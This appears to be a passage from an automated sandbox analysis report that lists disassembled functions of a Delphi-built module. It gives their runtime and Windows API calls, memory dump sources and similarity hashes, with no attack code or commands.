                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DBC0
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DBC5
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,00000000,?), ref: 5002DBCC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DBF1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DBF6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$RaiseString$Except$qqrvException@$bctr$qqrp20Sysutils@$Recpx14Recxi$AfterArrayClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucLength$qqrvList$qqrvLoadMetaObjectString$qqrp20
                                                                                                  • String ID:
                                                                                                  • API String ID: 434768823-0
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011A8B), ref: 50011A03
                                                                                                  • GetThreadLocale.KERNEL32(00000000,50011A8B), ref: 50011A08
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011A8B), ref: 50011A27
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50011A8B), ref: 50011A51
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50011A8B), ref: 50011A5B
                                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,00000000,?,00000000,?,00000000,50011A8B), ref: 50011A67
                                                                                                  • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,00000100,00000000,?,00000000,?,00000000,50011A8B), ref: 50011A70
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@Unicode$System@@$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Error$qqrvInternalLastLocaleRaiseStringx20Sysutils@Thread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3094671988-0
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011B5F), ref: 50011AD7
                                                                                                  • GetThreadLocale.KERNEL32(00000000,50011B5F), ref: 50011ADC
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011B5F), ref: 50011AFB
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50011B5F), ref: 50011B25
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,50011B5F), ref: 50011B2F
                                                                                                  • LCMapStringW.KERNEL32(00000000,00000200,00000000,?,00000000,?,00000000,50011B5F), ref: 50011B3B
                                                                                                  • @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,00000200,00000000,?,00000000,?,00000000,50011B5F), ref: 50011B44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@Unicode$System@@$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Error$qqrvInternalLastLocaleRaiseStringx20Sysutils@Thread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3094671988-0
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3B8
                                                                                                  • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3CA
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3CF
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3DE
                                                                                                  • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3F0
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F3F5
                                                                                                  • @Varutils@ESafeArrayError@$bctr$qqrlx20System@UnicodeString.RTL120(00000000,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F407
                                                                                                    • Part of subcall function 5002F438: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002F450
                                                                                                    • Part of subcall function 5002F438: @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F46F
                                                                                                    • Part of subcall function 5002F438: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002F4C9), ref: 5002F486
                                                                                                    • Part of subcall function 5002F438: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002F4C9), ref: 5002F49A
                                                                                                    • Part of subcall function 5002F438: @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5002F4C9), ref: 5002F4A6
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,5002F42C,?,?,00000000,00000000), ref: 5002F40C
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                   • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$String$Unicode$System@@$Raise$ArrayError@$bctr$qqrlx20Except$qqrvLoadSafeString$qqrp20Varutils@$Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Error$qqrucException@$bctr$qqrx20Format$qqrx20List$qqrvMetaRecxiStringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2318074137-0
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D446
                                                                                                  • lstrlenA.KERNEL32(?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D455
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D461
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D46A
                                                                                                  • @System@Utf8ToUnicode$qqrpbuipcui.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D474
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D485
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D491
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,?,00000000,5000D4B6,?,?,?,?,00000000), ref: 5000D49B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$Asg$qqrr20Stringx20$Length$qqrr20Stringi$Char$qqrx20Unicode$qqrpbuipcuiUtf8lstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1537582155-0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: T@P
                                                                                                  • API String ID: 0-2218095447
                                                                                                  APIs
                                                                                                  • @System@AcquireExceptionObject$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000860A
                                                                                                  • @System@TObject@Free$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008617
                                                                                                  • @System@AcquireExceptionObject$qqrv.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000861C
                                                                                                  • @System@UnregisterModule$qqrp17System@TLibModule.RTL120(?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008644
                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 5000865C
                                                                                                  • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,500086BE,500041BB,50004202), ref: 50008694
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$AcquireExceptionObject$qqrv$ExitFreeFree$qqrvLibraryModuleModule$qqrp17Object@ProcessUnregister
                                                                                                  • String ID: T@P
                                                                                                  • API String ID: 3627422618-2218095447
                                                                                                  APIs
                                                                                                  • @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(00000000,5001C9B7), ref: 5001C94D
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C430
                                                                                                    • Part of subcall function 5001C3F4: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C442
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C466
                                                                                                    • Part of subcall function 5001C3F4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C48D
                                                                                                    • Part of subcall function 5001C3F4: @Sysutils@StrScan$qqrpxbb.RTL120(00000000,5001C4C0,?,?,?,00000000), ref: 5001C49C
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C9B7), ref: 5001C970
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C9B7), ref: 5001C991
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001C9B7), ref: 5001C99C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Sysutils@$Asg$qqrr20Char$qqrx20Copy$qqrx20Delimiter$qqrx20LastScan$qqrpxbbStringiiStringt1Stringx20
                                                                                                  • String ID: .\:
                                                                                                  • API String ID: 1552234271-496007442
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 50010D4D
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50010D5F
                                                                                                    • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                    • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                    • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                  • @Character@TCharacter@CheckNumber$qqr26Character@TUnicodeCategory.RTL120 ref: 50010D98
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120 ref: 50010DA1
                                                                                                  • @Character@TCharacter@CheckNumber$qqr26Character@TUnicodeCategory.RTL120 ref: 50010DB4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$CategoryCheckNumber$qqr26Unicode$Ascii$qqrbFindInitialize$qqrvLatin1$qqrbLoadLock
                                                                                                  • String ID: 0$9
                                                                                                  • API String ID: 940830643-1975997740
                                                                                                  APIs
                                                                                                  • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D85E
                                                                                                    • Part of subcall function 50004E58: @System@SetInOutRes$qqri.RTL120(0000D7B1,?,50004A02,?,?,50004A3D), ref: 50004E90
                                                                                                  • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D868
                                                                                                    • Part of subcall function 50004E58: @System@SetInOutRes$qqri.RTL120(0000D7B1,?,50004A02,?,?,50004A3D), ref: 50004EA4
                                                                                                  • @System@@Close$qqrr15System@TTextRec.RTL120(00000000,5000D89E), ref: 5000D872
                                                                                                    • Part of subcall function 50003F0C: CloseHandle.KERNEL32(?,5000D87C,00000000,5000D89E), ref: 50003F1B
                                                                                                    • Part of subcall function 50003F0C: VirtualFree.KERNEL32(?,00000000,00008000,5000D87C,00000000,5000D89E), ref: 50003F4B
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,5000D89E), ref: 5000D881
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,5000D89E), ref: 5000D88B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$Close$qqrr15Text$Clr$qqrpvFreeRes$qqri$CloseHandleMem$qqrpvVirtual
                                                                                                  • String ID: 0CP$`@P
                                                                                                  • API String ID: 1074734335-699206834
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000,?), ref: 500029AE
                                                                                                  • Sleep.KERNEL32(0000000A,00000000,?), ref: 500029C8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • API ID: Sleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3472027048-0
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B78E), ref: 5001B6D2
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B78E), ref: 5001B6E0
                                                                                                    • Part of subcall function 50009D94: @System@@FreeMem$qqrpv.RTL120(5000D52A,?,00000000,5000D54A,?,?,?,?,00000000,?,5000D57B,?,?,50006AD6), ref: 50009DC3
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001B78E), ref: 5001B6FD
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001B78E), ref: 5001B725
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001B78E), ref: 5001B739
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001B78E), ref: 5001B743
                                                                                                  • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?,00000000,5001B78E), ref: 5001B750
                                                                                                  • API ID: System@Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Char$qqrx20InternalStringx20$CompareFreeMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 2845561448-0
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169BA
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169FB
                                                                                                    • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 500169EF
                                                                                                    • Part of subcall function 5001B1C8: @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120 ref: 5001B1DB
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A27
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A33
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A4A
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016A76,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016A56
                                                                                                  • API ID: System@Unicode$System@@$Stringx20$Cat3$qqrr20Stringt2$Asg$qqrr20FromStr$qqriStringSysutils@$CharChar$qqrr20Len$qqrr20StringbStringpci
                                                                                                  • String ID:
                                                                                                  • API String ID: 2719714811-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B8E6
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@TStringBuilder@set_Length$qqri.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B8FB
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B918
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B940
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B953
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,5002B982,?,?,?,?,?,?,5002B7F6,00000000,5002B80C,?,?,00000000), ref: 5002B967
                                                                                                  • API ID: StringSystem@$System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Builder@set_Char$qqrx20Length$qqriMove$qqrpxvpviSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 509217649-0
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                    • Part of subcall function 50009D40: @System@@NewUnicodeString$qqri.RTL120(00000000,?,50004742), ref: 50009D5B
                                                                                                    • Part of subcall function 50009D40: @System@Move$qqrpxvpvi.RTL120(00000000,?,50004742), ref: 50009D69
                                                                                                    • Part of subcall function 50009D40: @System@@FreeMem$qqrpv.RTL120(50004742), ref: 50009D8B
                                                                                                  • @System@@NewUnicodeString$qqri.RTL120 ref: 5000A227
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A23B
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A253
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A263
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A279
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A287
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A297
                                                                                                  • API ID: System@$Unicode$System@@$Asg$qqrr20StringStringx20$Move$qqrpxvpvi$String$qqri$Clr$qqrpvFreeMem$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 628645394-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 5002879B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028822), ref: 500287C3
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287D7
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,00000000,50028822), ref: 500287E0
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiChar$qqrx20FromStr$qqrr20Stringx27System@%T$us$i0$%$Internal
                                                                                                  • String ID:
                                                                                                  • API String ID: 1771006815-0
                                                                                                  • Opcode ID: 776671bc0eec5f129ae3a97f8df4fb0cf3bb1fa82ad82360c3030aec5ea0138b
                                                                                                  • Instruction ID: dc23fba009a07f5ee1e34ee886edddc6a55f2f6ed9e61d9879787caccd6cdf4c
                                                                                                  • Opcode Fuzzy Hash: 776671bc0eec5f129ae3a97f8df4fb0cf3bb1fa82ad82360c3030aec5ea0138b
                                                                                                  • Instruction Fuzzy Hash: 7E219835A022969FDF01DFB8EC9195EB7F9EF54200FA14676E504A3255EB70EE41C780
                                                                                                  APIs
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120 ref: 50008CCE
                                                                                                    • Part of subcall function 500087FC: @System@@NewAnsiString$qqrius.RTL120(?,?,500056AE,00000000), ref: 50008821
                                                                                                    • Part of subcall function 500087FC: @System@Move$qqrpxvpvi.RTL120(00000000,?,500056AE,00000000), ref: 5000882D
                                                                                                    • Part of subcall function 500087FC: @System@@FreeMem$qqrpv.RTL120(500056AE,00000000), ref: 5000884F
                                                                                                  • @System@@NewAnsiString$qqrius.RTL120 ref: 50008CF2
